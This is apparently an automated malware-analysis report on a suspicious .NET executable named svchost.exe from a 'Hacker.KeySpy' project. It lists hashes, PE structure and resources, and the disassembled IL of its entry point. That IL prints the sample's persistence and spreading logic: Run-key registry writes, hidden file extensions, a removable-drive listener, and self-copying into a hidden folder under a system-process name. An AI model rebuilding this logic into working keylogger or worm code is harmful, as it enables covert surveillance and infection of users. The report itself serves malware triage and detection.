Suspicious
Suspect

c4638f8ea46fa6954e0b5589f231c769

PE Executable
|
MD5: c4638f8ea46fa6954e0b5589f231c769
|
Size: 76.8 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
c4638f8ea46fa6954e0b5589f231c769
Sha1
6eeced94995d65a319091a60d324cf9c21fc9a93
Sha256
7f138ed8d121160dd1d3c08d77a0075540a90c0d3da75dfa5a0f19979b8a7380
Sha384
70dafe4bc33899d9514d389950f263e9d69bba7159bd00815336de74e399d451c42c827199f169eb57d68ba939df024d
Sha512
b9d6f034112f88d217f274facc723bb9aa6239c92399fe78cef37cefcfa264ccf4595ec3c6514c64c87d2d530f8d0c3b8280388befac75c0ef245beeddfc761a
SSDeep
1536:wNjum7Ynydw8KwHpF73i6EBXlLOUpgkYuUH8XIMOzH/ZxyO:wNjum0ydDKqX0LOUpzA84Bw
TLSH
6B73BF09B7E98692C43E167944535B000370FD226A4BDB972FE174AF2D663818BB2F5F
File Structure
c4638f8ea46fa6954e0b5589f231c769
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Hacker.KeySpy.Controls.DriveListener.resources
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: h:\Secret\Hacker.KeySpy\obj\Debug\svchost.pdb
Module Name

svchost.exe
Full Name

svchost.exe
EntryPoint

System.Int32 Hacker.KeySpy.Program::Main(System.String[])
Scope Name

svchost.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v2.0.50727
Tables Header Version

512
WinMD Version

<null>
Assembly Name

svchost
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

77
Main Method

System.Int32 Hacker.KeySpy.Program::Main(System.String[])
Main IL Instruction Count

283
Main IL

nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> ldc.i4.1 <null> ldstr APName ldloca.s V_1 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr Hidden ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr HideFileExt ldc.i4.1 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldc.i4.2 <null> newobj System.Void Hacker.KeySpy.Controls.DriveListener::.ctor(System.IO.DriveType) stloc.2 <null> ldloc.2 <null> ldnull <null> ldftn System.Void Hacker.KeySpy.Program::flashDriveListener_DriveExists(System.Object,Hacker.KeySpy.Controls.DriveExistsEventArgs) newobj System.Void Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void Hacker.KeySpy.Controls.DriveListener::add_DriveExists(Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler) nop <null> ldloc.2 <null> callvirt System.Void Hacker.KeySpy.Controls.DriveListener::Start() nop <null> ldsfld System.IO.DriveInfo Hacker.KeySpy.Program::progDrive callvirt System.IO.DriveType System.IO.DriveInfo::get_DriveType() ldc.i4.3 <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_00C4: nop nop <null> ldloc.1 <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_00B1: newobj System.Void Hacker.KeySpy.MainContext::.ctor() nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave IL_02F9: nop newobj System.Void Hacker.KeySpy.MainContext::.ctor() stloc.3 <null> ldloc.3 <null> call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.ApplicationContext) nop <null> nop <null> br IL_02C0: ldc.i4.0 nop <null> ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0130: ldloc.1 nop <null> ldstr explorer.exe ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String,System.String) pop <null> nop <null> ldloc.1 <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0151: ldnull nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave IL_02F9: nop ldnull <null> stloc.s V_4 nop <null> ldc.i4.s 37 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_01B6: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01A5: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_01FE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01DD: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave IL_02B1: nop pop <null> nop <null> ldc.i4.5 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0266: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_0255: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_02AE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_028D: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave.s IL_02B1: nop nop <null> ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop pop <null> nop <null> ldc.i4.m1 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop nop <null> leave.s IL_02F3: nop nop <null> ldloc.0 <null> call System.Boolean System.Convert::ToBoolean(System.Int32) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_02E9: nop nop <null> call System.Void System.Windows.Forms.Application::Restart() nop <null> nop <null> br.s IL_02F1: nop nop <null> call System.Void System.Windows.Forms.Application::Exit() nop <null> nop <null> nop <null> endfinally <null> nop <null> ldloc.0 <null> stloc.s V_5 br.s IL_02F9: nop nop <null> ldloc.s V_5 ret <null>
c4638f8ea46fa6954e0b5589f231c769 (76.8 KB)
File Structure
c4638f8ea46fa6954e0b5589f231c769
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Hacker.KeySpy.Controls.DriveListener.resources
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙